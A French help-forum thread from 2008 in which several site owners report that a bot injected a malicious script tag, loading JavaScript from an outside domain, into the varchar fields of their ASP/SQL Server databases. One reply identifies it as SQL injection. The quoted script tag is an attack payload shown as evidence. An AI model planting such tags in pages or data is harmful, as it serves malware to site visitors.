Sujet Précédent Sujet Suivant

Vulnérabilité SQL serveur et ASP

Fermé
Fantome - 21 mai 2008 à 13:19
 razi - 31 mai 2008 à 00:48
Bonjour,
Voila j'ai un site developpé en asp avec une base de données SQl serveur. Un matin toutes les tables de la base on été infecté de code javascript venant de cette adresse <script src=http://www.dota11.cn/m.js></script>.
J'aimérai savoir comment l'attque a été possible et comment me protéger défiitivement.
A voir également:

3 réponses

Réponse 1 / 3
Fred
24 mai 2008 à 14:30
Je viens de subir la meme chose

Je préciserais simplement que le robot qui a effectué l'attaque a modifie les champs varchar pour ajouter le tag script que Fantome mentionne

Est ce que vous avez une idée ?
0
Réponse 2 / 3
Seb
26 mai 2008 à 10:43
Bonjour,

c'est la seconde fois que cela m'arrive. pas d'idées. A part refaire un restore de la base

Sébastien
0
Réponse 3 / 3
razi
31 mai 2008 à 00:48
Le problème est discuté sur le forum Microsoft.
C'est un problème d'injection. La solution est postée.

http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&SiteID=1
0

Discussions similaires

qu'est-ce que diff message ?
zebulonmarie -
mumu -

18 réponses
Comment reconnaitre si un SMS m'indiquant un message vocal est une arnaque ?
kikidefer -
brucine -

9 réponses
connection impossible au site impots.gouv.fr
funnycat -
Allisonmartin04 -

15 réponses
chaima csc
chaima -
chaima -

1 réponse
[PL/SQL] le rôle exact du (+) dans une clause
mathanz -
mathanz -

2 réponses